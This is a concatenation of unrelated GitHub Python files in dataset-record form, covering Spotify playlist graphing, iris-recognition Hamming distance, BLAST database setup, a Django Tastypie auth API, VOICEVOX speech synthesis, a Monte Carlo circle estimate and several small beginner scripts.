[-1]","repo_name":"Liebestraum1/Algorithm_Python","sub_path":"Programmers/Level_2/무인도 여행.py","file_name":"무인도 여행.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36758950289","text":"import sys\nimport config\n#from util import *\nimport spotipy\nimport spotipy.util as util\nimport time\nimport json\nimport pandas as pd\n#from tqdm import tqdm\nimport matplotlib.pyplot as plt\nplt.style.use('classic')\nimport numpy as np\nimport seaborn as sns\n\nglobal args\nglobal token\nglobal playlist_uri\nglobal scope\nglobal analyze\nglobal num\n\ntoken = ''\nscope = 'user-library-read, user-read-playback-state, user-modify-playback-state'\n\n#Modify this to get more info (may time out on large playlists)\nanalyze = False\n\nnum = 10\n\nplt.close(\"all\")\nsns.set()\nsns.set_theme()\n\n#HOW TO RUN ON COMMANDLINE:\n#When using command line, playlist link must always be used and placed as last arg\n\n#To analyze N tracks from a specific playlist: 'N True '\n#To only get N tracks from a specific playlist: 'N \n#To only get from a specific playlist: ''\n#DEFAULT: To get playlist specified in config.py: Empty commandline\n\n#Sets up spotipy authorization token\ndef spotStart():\n print('spotStart called')\n global token\n token = util.prompt_for_user_token(config.username,\n scope,\n client_id=config.SP_CLIENT_ID,\n client_secret=config.SP_CLIENT_SECRET,\n redirect_uri=config.SP_REDIRECT_URI)\n print('token created as ', token)\n\n#Iterates through playlist and returns a list of lists containing each track's artist name, track name, album release date, and track popularity\ndef iterate_tracks(results, analyze):\n features = []\n #DO THIS FOR PROGRESS BARS\n #for i, item in enumerate(tqdm(results['items'])):\n\n for i, item in enumerate(results['items']):\n track = item['track']\n #Check if track was uploaded from a local file (local files don't have features)\n if not track['is_local']:\n album = sp.album(track['album']['id'])\n print(\n \" %d %32.32s %s %d\" %\n (i, track['artists'][0]['name'], track['name'], track['popularity']))\n info = [track['artists'][0]['name'], track['name'], album['release_date'], track['popularity']]\n if analyze:\n analysis = list(sp.audio_features(track['uri'])[0].values())\n features.append(info + analysis)\n else:\n features.append(info)\n return features\n\n#Prints the list of lists generated by iterate_tracks()\ndef show_features(results):\n for i, item in enumerate(results):\n print(\n \" %d %s\" %\n (i, results[i]))\n\n#Assembles a data frame\ndef df_tracks(tracklist, analyze):\n if(analyze):\n df = pd.DataFrame(tracklist, columns=['artist',\n 'track_name',\n 'release_date', 'popularity'] + list(sp.audio_features('7tr2za8SQg2CI8EDgrdtNl')[0].keys()))\n\n df.rename(columns={'uri':'song_uri'}, inplace=True)\n\n #df.drop_duplicates(subset=['artist', 'track', 'release_date'], inplace=True)\n\n # Reorder the cols to have identifiers first, auditory features last\n cols = ['artist', 'track_name', 'release_date', 'popularity'\n 'analysis_url', 'type', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness',\n 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms', 'time_signature']\n return df\n else:\n df = pd.DataFrame(tracklist, columns=['artist',\n 'track_name',\n 'release_date', 'popularity'])\n\n # Reorder the cols to have identifiers first, auditory features last\n cols = ['artist', 'track_name', 'release_date', 'popularity']\n return df\n\n#Prints n artists with highest occurences\ndef df_nlargest(df, n):\n freq = df.groupby([df.index, 'artist']).count().plot(kind='bar')\n print(freq)\n\n#Graphs n artists in df by occurences\ndef graph_nlargest(df, n):\n ax = sns.countplot(x=\"artist\", data=df, order=df.artist.value_counts().iloc[:n].index)\n plt.show()\n\nprint ('Python program is starting...')\nif __name__ == '__main__':\n args = sys.argv\n print ('Args: ', str(args))\n\n #Get num, analyze and playlist link from commandline\n if len(args) > 3:\n num = int(args[1])\n analyze = args[2]\n playlist_uri = args[3]\n #Else get num and playlist link from commandline\n elif len(args) > 2:\n num = int(args[1])\n playlist_uri = args[2]\n #Else only get playlist link from commandline\n elif len(args) > 1:\n playlist_uri = args[1]\n #Else, get playlist link from config file\n else:\n playlist_uri = config.playlist_uri\n\n spotStart()\n sp = spotipy.Spotify(auth=token)\n playlist = sp.playlist(playlist_uri, market=None, additional_types=('track',))\n print(\"Playlist: \", playlist['name'])\n results = sp.playlist(playlist['id'], fields=\"tracks,next\")\n\n #Make list of playlist's tracks\n tracks = results['tracks']\n #Create list of first tracks in tracks\n features = iterate_tracks(tracks, analyze)\n #Since sp.playlist returns first 100 tracks, iterate through tracks['next'] to get next 100\n while tracks['next']:\n tracks = sp.next(tracks)\n features.extend(iterate_tracks(tracks, analyze))\n\n #DEBUG\n #show_features(features)\n\n #Build data frame\n df = df_tracks(features, analyze)\n\n #Graph by artist occurences\n graph_nlargest(df, num)\n","repo_name":"jvetting/bool-box","sub_path":"Python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14031998401","text":"import pandas as pd\nimport numpy as np\nimport torch\n \ndef get_iris():\n # Load and process data\n data = pd.read_csv('./data/iris.csv')\n data_size = len(data)\n # Map Iris variety to numerical label\n data.loc[data['variety'] == 'Versicolor', 'variety'] = 0\n data.loc[data['variety'] == 'Virginica', 'variety'] = 1\n data.loc[data['variety'] == 'Setosa', 'variety'] = 2\n # Shuffle data, split to train and test set\n data = data.iloc[torch.randperm(data_size), :]\n X, y = (torch.tensor(data.iloc[:, 0:-1].to_numpy()),\n torch.tensor(data.iloc[:, [-1]].to_numpy(dtype = np.int64)))\n return X, y\n\ndef get_clusters_2D(num_clusters, sigma_diag = 0.2, radius = 1, num_examples = 600):\n '''\n num_clusters: number of clusters\n sigma_diag: \n '''\n pi = torch.acos(torch.zeros(1)).item()*2\n # Mu and Sigma for Gaussian distributions\n mu = torch.cat(\n [radius*torch.cos(torch.arange(num_clusters)*2*pi/num_clusters).unsqueeze(dim = 1),\n radius*torch.sin(torch.arange(num_clusters)*2*pi/num_clusters).unsqueeze(dim = 1)],\n dim = 1)\n sigma = sigma_diag*torch.tensor([[1., 0.], [0., 1.]])\n # Sample from Gaussian distributions\n examples_per_cluster = torch.tensor(num_examples/num_clusters, dtype = torch.int)\n X = torch.cat([torch.distributions.multivariate_normal.MultivariateNormal(mu[cluster, :], sigma).sample([examples_per_cluster]) for cluster in range(num_clusters)], dim = 0)\n y = torch.cat([torch.tensor([[cluster]]*examples_per_cluster) for cluster in range(num_clusters)], dim = 0)\n # Shuffle data\n shuffle_index = torch.randperm(X.size()[0])\n X, y = X[shuffle_index], y[shuffle_index]\n return X, y","repo_name":"votrinhan88/self-studying","sub_path":"machine-learning/utils_data.py","file_name":"utils_data.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12893584935","text":"import os,subprocess\nfrom pathlib import Path\n\nclass DATABASE:\n\n def __init__(self, testset, dataset):\n self.testset = testset\n self.dataset = dataset\n\n def removedup(self):\n small_content = []\n larget_content = {}\n with open(self.testset, \"r\") as smallFile:\n oneline = smallFile.readline()\n temp = []\n while oneline:\n if not oneline.strip(\"\\n\").strip():\n oneline = smallFile.readline()\n continue\n if oneline.startswith(\">\"):\n if temp:\n small_content.append(\"\".join(temp))\n temp = []\n else:\n temp.append(oneline.strip('\\n'))\n oneline = smallFile.readline()\n small_content.append(\"\".join(temp))\n with open(self.dataset, \"r\") as largeFile:\n oneline = largeFile.readline()\n temp = []\n entire = []\n while oneline:\n if not oneline.strip(\"\\n\").strip():\n oneline = largeFile.readline()\n continue\n if oneline.startswith(\">\"):\n if entire:\n larget_content.update({\"\".join(temp): \"\".join(entire)})\n temp = []\n entire = []\n else:\n temp.append(oneline.strip(\"\\n\"))\n entire.append(oneline)\n oneline = largeFile.readline()\n larget_content.update({\"\".join(temp): \"\".join(entire)})\n\n print(\"Before removing, the number of larger dataset is \"+ str(len(larget_content)))\n\n for each in small_content:\n if each in larget_content:\n del larget_content[each]\n\n print(\"After removing duplicate records, the number of larger dataset is \" + str(len(larget_content)))\n # windows path\n # clean_dataset = str(Path().absolute()) + \"\\database\\blast_database\"\n # if not os.path.exists(str(Path().absolute()) + \"\\database\\\"):\n # os.makedirs(str(Path().absolute()) + \"\\database\\\")\n clean_dataset = str(Path().absolute())+\"/database/blast_database\"\n if not os.path.exists(str(Path().absolute()) + \"/database/\"):\n os.makedirs(str(Path().absolute()) + \"/database/\")\n with open(clean_dataset, \"w\") as result:\n result.writelines(larget_content.values())\n\n print(\"done!\")\n return clean_dataset\n\n def makedb(self, input):\n # windows path\n # make_db_output = str(Path().absolute()) + \"\\database\\blast_database\"\n # blast_database_exe = str(Path().absolute()) + \"\\tools\\ncbi-blast-2.9.0+\\bin\\makeblastdb\"\n make_db_output= str(Path().absolute())+ \"/database/blast_database\"\n blast_database_exe=str(Path().absolute())+\"/tools/ncbi-blast-2.9.0+/bin/makeblastdb\"\n subprocess.call([blast_database_exe,\"-in\",input,\"-title\",make_db_output,\"-dbtype\",\"prot\"])\n\n def compute(self):\n output = self.removedup()\n self.makedb(output)\n os.remove(output)\n\n","repo_name":"shivashamloo/tcp-follow_up","sub_path":"making_database.py","file_name":"making_database.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32976764392","text":"import numpy as np\nfrom utils.image import valueImageToBoolean\n\n\"\"\"\nDescription:\n Calculates Hamming Distance between two bit sequences taking into consideration\n masking bit seqence.\n\nArguments:\n * testedSeq - bit seqence that is tested - array of 0 and 1\n * testedMaskSeq - bit sequence for noise mask of tested bit sequence\n * modelSeq - bit sequence that tested seq is tested against - array of 0 and 1\n * maskSeq - bit sequence for determining whether to count the difference or not - array of 0 and 1\n\nReturns:\n * HD - hamming distance value (0; 1)\n\"\"\"\n\n# Shifts by two bits (assuming one Gabor filter is used - if more are used, the sequences\n# should be shifted by 2*N where N is the number of used Gabor filters)\ndef shiftBitSequenceLeft(sequence, bitWidth=2):\n leftShift = np.concatenate((sequence[bitWidth:], sequence[0:bitWidth]))\n\n return leftShift\n\ndef shiftBitSequenceRight(sequence, bitWidth=2):\n rightShift = np.concatenate((sequence[-bitWidth:], sequence[:-bitWidth]))\n\n return rightShift\n\ndef calcHammingDistance(testedSeq, testedMask, modelSeq, modelMask):\n # Masks - 0 refers to masked, insignificant bit, 1 refers to significant bit\n # Bitwise and will create a mask that combines both masked regions\n # Bitwise or would cause the masked regions to be overriden by value '1'\n mask = np.bitwise_and(testedMask, modelMask)\n numberOfCheckedBits = np.sum(mask==True)\n\n matches = np.count_nonzero(np.bitwise_and(np.bitwise_xor(testedSeq, modelSeq), mask))\n\n hd = matches / numberOfCheckedBits\n\n # Temporary fix for NaN HD - caused by faulty segmentation when mask if totally black\n if (np.isnan(hd)):\n hd = 2.0\n\n return float(hd)\n\n# From image to Boolean (+ reshape to vector, but im not sure if required)\n# Add shifting logic\n\ndef calcHammingWithShifts(testedSeq, testedMask, modelSeq, modelMask, shiftsNumber):\n results = []\n testedSeqShiftedLeft = testedSeqShiftedRight = testedSeq.copy()\n testedMaskShiftedLeft = testedMaskShiftedRight = testedMask.copy()\n\n results.append(calcHammingDistance(testedSeq, testedMask, modelSeq, modelMask))\n\n if shiftsNumber > 0:\n for i in range(1, shiftsNumber + 1):\n testedSeqShiftedLeft = shiftBitSequenceLeft(testedSeqShiftedLeft)\n testedSeqShiftedRight = shiftBitSequenceRight(testedSeqShiftedRight)\n testedMaskShiftedLeft = shiftBitSequenceLeft(testedMaskShiftedLeft)\n testedMaskShiftedRight = shiftBitSequenceRight(testedMaskShiftedRight)\n\n results.append(calcHammingDistance(testedSeqShiftedLeft, testedMaskShiftedLeft, modelSeq, modelMask))\n results.append(calcHammingDistance(testedSeqShiftedRight, testedMaskShiftedRight, modelSeq, modelMask))\n\n return results\n\ndef hamming_distance(testedSeq, testedMask, modelSeq, modelMask, shiftsNumber, acceptedHammingDist):\n testedSeq = valueImageToBoolean(testedSeq.flatten())\n testedMask = valueImageToBoolean(testedMask.flatten())\n modelSeq = valueImageToBoolean(modelSeq.flatten())\n modelMask = valueImageToBoolean(modelMask.flatten())\n\n hammingDistances = calcHammingWithShifts(testedSeq, testedMask, modelSeq, modelMask, shiftsNumber)\n\n minHammingDistance = np.amin(np.asarray(hammingDistances))\n\n return {\n 'isMatched': bool(minHammingDistance <= acceptedHammingDist),\n 'minDistanceValue': minHammingDistance,\n 'hammingDistances': hammingDistances,\n }\n","repo_name":"jakublamprecht/irisRecognition","sub_path":"server/processing/matching/hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37385703977","text":"import csv\r\n\r\n\r\ndef ground_file(filename):\r\n ground = {}\r\n with open(filename,'r') as f:\r\n csvfile = csv.reader(f)\r\n for lines in csvfile:\r\n ground[lines[0]] = float(lines[1])\r\n\r\n print(\"ground vales :\", len(ground))\r\n return ground\r\n\r\n\r\ndef accuracy(ground,mal_filename):\r\n mal = {}\r\n with open(mal_filename,'r') as f:\r\n csvfile = csv.reader(f)\r\n for lines in csvfile:\r\n mal[lines[0]] = float(lines[1])\r\n if mal[lines[0]] <0:\r\n mal[lines[0]] = 0\r\n \r\n wr_dec = 0\r\n crr_dec = 0\r\n missing = 0\r\n x = []\r\n for i in ground:\r\n if i not in mal:\r\n missing +=1\r\n else:\r\n if abs(mal[i] - ground[i]) >=1:\r\n wr_dec +=1\r\n x.append(abs(mal[i]-ground[i]))\r\n else:\r\n crr_dec+=1\r\n x.sort()\r\n print(x)\r\n print(\"total decoded values: \", len(mal))\r\n print(\"Wrongly decoded values: \", wr_dec)\r\n print(\"Correctly decoded values: \", crr_dec)\r\n print(\"missing values: \", missing)\r\n\r\n\r\n\r\nground = ground_file('ground.csv')\r\n\r\nprint(\"\\nunique error:\")\r\naccuracy(ground,'unique.csv')\r\ntry:\r\n print(\"\\nNormal error:\")\r\n accuracy(ground,'normal.csv')\r\n\r\n print(\"\\nRelay error:\")\r\n accuracy(ground,'relay.csv')\r\n\r\n print(\"\\nrelay with random error:\")\r\n accuracy(ground,'random.csv')\r\nexcept:\r\n print(\"done\")\r\n\r\n","repo_name":"inAJam/Bloomfilter","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6590984873","text":"import sys\nimport os\n\nsys.path.insert(0, os.path.abspath('../../'))\nos.environ['DJANGO_SETTINGS_MODULE'] = 'picview.picview_settings_example'\n\n\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.intersphinx',\n]\n\n\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nmaster_doc = 'index'\n\n\nproject = 'picview'\ncopyright = '2014, Wictor Olseryd'\n\nversion = '0.1.0'\nrelease = '0.1.0'\n\nexclude_patterns = []\npygments_style = 'sphinx'\nhtml_theme = 'nature'\nhtml_static_path = ['_static']\nhtmlhelp_basename = 'picviewdoc'\n\n\n\nlatex_elements = {}\nlatex_documents = [\n ('index', 'picview.tex', 'picview Documentation',\n 'Wictor Olseryd', 'manual'),\n]\n\n\nman_pages = [\n ('index', 'picview', 'picview Documentation',\n ['Wictor Olseryd'], 1)\n]\n\n\ntexinfo_documents = [\n ('index', 'picview', 'picview Documentation',\n 'Wictor Olseryd', 'picview', 'One line description of project.',\n 'Miscellaneous'),\n]\n\nintersphinx_mapping = {\n 'python': ('http://docs.python.org/', None),\n 'django': ('http://pillow.readthedocs.org/en/latest/', None),\n 'PIL': ('http://pillow.readthedocs.org/en/latest/', None),\n}\n","repo_name":"wicol/picview","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42164373478","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom tastypie.resources import ModelResource\nfrom django.contrib.auth import authenticate, login, logout\nfrom tastypie.http import HttpUnauthorized, HttpForbidden\nfrom django.conf.urls import url\nfrom tastypie.utils import trailing_slash\nfrom tastypie.models import create_api_key, ApiKey\nfrom tastypie.exceptions import BadRequest\nfrom django.db import IntegrityError\nfrom tastypie.authentication import ApiKeyAuthentication,BasicAuthentication,Authentication\nfrom tastypie.authorization import Authorization\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom YqlConnect.oauthUsers import OauthUsers\nfrom YqlConnect.connectToYqlOauth import ConnectToYqlOauth\n\n# models.signals.post_save.connect(create_api_key, sender=User)\n\n\nclass RequestToken(ModelResource):\n\n class Meta:\n resource_name = 'RequestToken'\n default_format = \"application/json\"\n authentication = ApiKeyAuthentication()\n\n def get_list(self, request, **kwargs):\n # Do any operation here and return in form of json in next line\n username = request.user.username;\n oauthUsers = OauthUsers()\n response = oauthUsers.requestOauth(username)\n\n if(response[0] == 'RefreshAccessToken'):\n c = ConnectToYqlOauth(username)\n userInformationRetrieval = c.getAllUserInformation();\n return self.create_response(request, {'responseType':response[0], 'value':response[1], 'userInformationRetrieval':userInformationRetrieval})\n else:\n return self.create_response(request, {'responseType':response[0], 'value':response[1]})\n\nclass AccessToken(ModelResource):\n\n class Meta:\n resource_name = 'AccessToken'\n default_format = \"application/json\"\n authentication = ApiKeyAuthentication()\n\n def get_list(self, request, **kwargs):\n # Do any operation here and return in form of json in next line\n username = request.user.username;\n oauth_verifier = request.GET['oauth_verifier']\n oauthUsers = OauthUsers()\n response = oauthUsers.getAccessToken(username,oauth_verifier)\n c = ConnectToYqlOauth(username)\n userInformationRetrieval = c.getAllUserInformation();\n return self.create_response(request, {'responseType':response[0], 'accessTokenRetrieval':response[1], 'userInformationRetrieval':userInformationRetrieval})\n\n\n\nclass UserResource(ModelResource):\n class Meta:\n queryset = User.objects.all()\n fields = ['first_name', 'last_name', 'email','username']\n allowed_methods = ['get', 'post']\n resource_name = 'user'\n filtering = {\n \"username\": (\"exact\")\n }\n always_return_data = True\n\n def override_urls(self):\n return [\n url(r\"^(?P%s)/login%s$\" %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('login'), name=\"api_login\"),\n url(r'^(?P%s)/logout%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('logout'), name='api_logout'),\n ]\n\n def obj_create(self, bundle, request=None, **kwargs):\n username, password, email = bundle.data['username'], bundle.data['password'], bundle.data['email']\n try:\n bundle.obj = user = User.objects.create_user(username,email,password)\n apiKey = ApiKey.objects.create(user=user)\n \n bundle.data['apiKey'] = apiKey.key\n except IntegrityError:\n raise BadRequest('That username already exists')\n return bundle\n \n def login(self, request, **kwargs):\n self.method_check(request, allowed=['post'])\n\n data = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))\n\n username = data.get('username', '')\n password = data.get('password', '')\n\n user = authenticate(username=username, password=password)\n if user:\n apiKey = ApiKey.objects.get(user = user)\n apiKey = apiKey.key\n if user.is_active:\n login(request, user)\n return self.create_response(request, {\n 'success': True, 'apiKey' : apiKey\n })\n else:\n return self.create_response(request, {\n 'success': False,\n 'reason': 'disabled',\n }, HttpForbidden )\n else:\n return self.create_response(request, {\n 'success': False,\n 'reason': 'incorrect',\n }, HttpUnauthorized )\n\n def logout(self, request, **kwargs):\n self.method_check(request, allowed=['get'])\n if request.user and request.user.is_authenticated():\n logout(request)\n return self.create_response(request, { 'success': True })\n else:\n return self.create_response(request, { 'success': False }, HttpUnauthorized)\n","repo_name":"ArcQ/OneStopFantasy","sub_path":"BackEnd/OneStopFantasy/RestApi/apiAuth.py","file_name":"apiAuth.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8596974276","text":"from rest_framework import serializers\n\n# Local\nfrom .models import Attribute, AllowedValue\nfrom oauth2.models import PaipassApplication\n#from debug.tools.dissect import print_object\nclass AllowedValueSerializer(serializers.Serializer):\n\n application = serializers.UUIDField(source='clientId')\n value = serializers.CharField()\n\nclass FormatSerializer(serializers.Serializer):\n\n regex = serializers.CharField()\n description = serializers.CharField()\n\nclass AttributeSerializer(serializers.Serializer):\n # messy for the sake of time; this could be cleaned up with a namedtuple\n optional_fields ={\"description\": [\"description\", serializers.CharField],\n 'maxValues': [\"max_values\", serializers.IntegerField],\n 'maxOwnerPerms': [\"max_owner_perms\",\n serializers.IntegerField],\n 'maxAllPerms': ['max_all_perms',\n serializers.IntegerField],\n 'format': ['format', FormatSerializer],\n\n }\n\n application = serializers.UUIDField(source='clientId')\n name = serializers.CharField(source='keyName')\n description = serializers.CharField()\n is_editable = serializers.BooleanField(source='isEditable')\n\n def __new__(cls, *args, **kwargs):\n cls.construct_optional_fields(kwargs['data'])\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.optional_fields:\n if hasattr(self.__class__, field):\n self.fields[field] = getattr(self.__class__, field)\n\n @classmethod\n def construct_optional_fields(cls, data):\n for field in cls.optional_fields:\n if field in data:\n cls.construct_optional_field(field)\n\n @classmethod\n def construct_optional_field(cls, name):\n optional_field = cls.optional_fields[name]\n cls_attr_name = optional_field[0]\n Field = optional_field[1]\n if name!=cls_attr_name:\n setattr(cls, cls_attr_name, Field(source=name))\n else:\n setattr(cls, cls_attr_name, Field())\n\n\nclass CreateAttributeSerializer(serializers.Serializer):\n\n def __new__(cls, *args, **kwargs):\n cls.construct_fields(kwargs['data'])\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self, *args, **kwargs):\n fields = kwargs.pop('fields', None)\n super().__init__(*args, **kwargs)\n self.fields['allowedValues'] = self.allowedValues\n self.fields['attribute'] = self.attribute\n\n\n @classmethod\n def construct_fields(cls, data):\n setattr(cls, 'attribute', AttributeSerializer(data=data))\n if 'allowedValues' in data:\n allowed_values = AllowedValueSerializer(many=True)\n setattr(cls, 'allowedValues', allowed_values)\n #_, s = print_object('CreateAttributeSerializer.construct_fields.cls',\n # cls)\n #print(s,flush=True)\n\n def create(self, validated_data):\n attr = validated_data['attribute']\n format = attr.pop('format')\n attr['format_regex'] = format['regex']\n attr['format_description'] = format['description']\n attr['application'] = PaipassApplication.objects.all().get(id=attr.pop('clientId'))\n attr['name'] = attr.pop('keyName')\n attr['is_editable'] = attr.pop('isEditable')\n\n preexisting_attrs = Attribute.objects.all().filter(application=attr['application'],\n name=attr['name'])\n if preexisting_attrs.count() > 0:\n attribute = preexisting_attrs.first()\n attribute.update(**attr)\n attribute.save()\n for allowed_value in validated_data['allowedValues']:\n av = AllowedValue.objects.all().get(attribute=attribute)\n av.update(value=allowed_value['value'])\n av.save()\n else:\n attribute = Attribute.objects.create(**attr)\n attribute.save()\n for allowed_value in validated_data['allowedValues']:\n\n av = AllowedValue.objects.create(value=allowed_value['value'],\n attribute=attribute)\n av.save()\n return attribute\n","repo_name":"projectpai/paipass","sub_path":"backend/attributes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"30766310770","text":"from datetime import date\ndata = date.today().year\natual= int(input('Ano de nascimento: '))\nidade = data - atual\n\nif idade == 18:\n print(f'Está na hora de vc ir pro quartel einkkkkkkkk, tu tem {idade}anos')\nelif idade<18:\n hm = 18 - idade\n print(f'te falta ainda {hm} anos pra tu se fuderkk')\n print(f'Deu sorte pq tu nasceu em {atual} e tem {idade} anos')\nelse:\n hm = idade - 18\n print(f'então mano, vo te deita na porrada sacou, ja era pra tu ta no exercito tem {hm} anos')\n ","repo_name":"Alvrzz/Repositorio-de-estudos-pessoais-Entra21","sub_path":"repositorio_de_estudos_entra21/estudos_pratica/Python/quartel maioridade.py","file_name":"quartel maioridade.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11932905237","text":"'''\r\nCreated on 5 jun 2022\r\n\r\n@author: txema\r\n'''\r\nimport time\r\n\r\nhora = time.strftime(\"%H\")\r\nminutos = time.strftime(\"%M\")\r\n\r\nif int(hora)>= 19:\r\n print(\"Es hora de ir a casa\")\r\n \r\nelse:\r\n print(\"Quedan {} horas y {} minutos para acabar el curro\". format(18 - int(hora), 59-int(minutos)))\r\n\r\n","repo_name":"txematc/openBootcamp","sub_path":"practica/ejercicio_7_2.py","file_name":"ejercicio_7_2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5467022090","text":"from dotenv import load_dotenv, find_dotenv\r\nimport os \r\n_ = load_dotenv(find_dotenv())\r\nBASE_URL=f\"http://127.0.0.1:{os.getenv('VOICEVOX_PORT')}\"\r\nimport urllib.parse as up\r\nimport requests\r\n\r\nSYSTEM=\"WINDOWS\"\r\n\r\n\r\n#text 2 audio function \r\ndef speak(sentence,speach_filename,base_url=BASE_URL,save_audio=False):\r\n speaker_id=os.getenv(\"speaker_id\")\r\n params_encoded=up.urlencode({\"text\":sentence,\"speaker\": speaker_id})\r\n r = requests.post(f\"{base_url}/audio_query?{params_encoded}\")\r\n print(r) \r\n #Raylene defulat audio settins \r\n voicevox_query = r.json()\r\n voicevox_query[\"volumeScale\"] = os.getenv(\"volumeScale\")\r\n voicevox_query[\"intonationScale\"] = os.getenv(\"intonationScale\")\r\n voicevox_query[\"prePhonemeLength\"]= os.getenv(\"prePhonemeLength\")\r\n voicevox_query[\"postPhonemeLength\"]= os.getenv(\"postPhonemeLength\")\r\n\r\n #Sythesize voice as wav file\r\n params_encoded = up.urlencode({\"speaker\":speaker_id})\r\n \r\n r = requests.post(f\"{base_url}/synthesis?{params_encoded}\",json=voicevox_query)\r\n\r\n with open(speach_filename+\".wav\", \"wb\") as f:\r\n f.write(r.content)\r\n f.close()\r\n\r\n #play audio \r\n if SYSTEM==\"WINDOWS\":\r\n import winsound\r\n winsound.PlaySound(speach_filename+\".wav\",winsound.SND_FILENAME)\r\n if not save_audio: #Delate speach filename after use \r\n os.remove(speach_filename+\".wav\")\r\n else: #Save the text file as well\r\n #Save text \r\n with open(speach_filename+\".txt\",\"w\",encoding=\"utf-8\") as f:\r\n f.write(sentence)\r\n f.close()\r\n else:\r\n import wave,pyaudio\r\n #Non windows audo code to finish \r\n wf = wave.open(speach_filename+\".wav\")\r\n p = pyaudio.PyAudio()\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n\r\n # 音声を再生\r\n chunk = 1024\r\n data = wf.readframes(chunk)\r\n while data != '':\r\n stream.write(data)\r\n data = wf.readframes(chunk)\r\n stream.close()\r\n p.terminate()\r\n","repo_name":"JarvisSan22/chracter_discordbot","sub_path":"utils/voicevox_utils.py","file_name":"voicevox_utils.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71244889049","text":"# Circle.py\nimport random\nimport math\n\n# Illustrate use of random numbers for integration using \n# introductory dart-board example\n\n# Initialize the random number generator using specified seed\nSEED = 203\nrandom.seed(SEED)\n\nNINSTANCES = 4000000 # Number of experiments to run\nNTOPRINT = 10 # Number of experiments to print\n\n# Keep track of number within unit circle of radius, 1.0\nncircle = 0\n\n# Generate multiple sets of two uniform random numbers each \n# in the range (-1.0,1.0). So random points inside a square with \n# sides of length 2 centered on (0,0)\n# The square has an area of 2*2 = 4 units. \n# What is the area of the circle with radius 1?\n\nfor i in range(NINSTANCES):\n x = random.uniform(-1.0,1.0)\n y = random.uniform(-1.0,1.0)\n# calculate the distance from the origin\n r = math.sqrt(x*x + y*y)\n if r < 1.0:\n ncircle += 1 # point is inside the circle, so count it\n if i < NTOPRINT:\n print('Trial ',i,' x = ',x,' y = ',y,' r = ',r)\n\nprint('Number of trial random numbers inside circle of radius 1.0 = ',ncircle)\n\n#Add extra code here from circle.txt\n","repo_name":"grahamwwilson/QNrandom","sub_path":"Circle.py","file_name":"Circle.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"20199135264","text":"# encoding=utf-8\n\nimport json\nimport sys\n\ndef parse_song_line(in_line):\n # json.loads()函数是将json格式数据转换为字典\n data = json.loads(in_line)\n name = data[\"result\"][\"name\"]\n tags = \",\".join(data[\"result\"][\"tags\"])\n subscribed_count = data[\"result\"][\"subscribedCount\"]\n if(subscribed_count<100):\n return False\n playlist_id = data[\"result\"][\"id\"]\n song_info = \"\"\n songs = data[\"result\"][\"tracks\"]\n for song in songs:\n try:\n song_info += \"\\t\"+\":::\".join([str(song[\"id\"]),song[\"name\"],song[\"artists\"][0][\"name\"],str(song[\"popularity\"])])\n except Exception as e:\n continue\n return name+\"##\"+tags+\"##\"+str(playlist_id)+\"##\"+str(subscribed_count)+song_info\n\n\ndef parse_file(in_file, out_file):\n out = open(out_file, \"w\",encoding=\"utf-8\")\n for line in open(in_file,\"rb\"):\n result = parse_song_line(line)\n if (result):\n out.write(result.encode(\"utf-8\").strip().decode() + b\"\\n\".decode())\n out.close()\n\n\n# 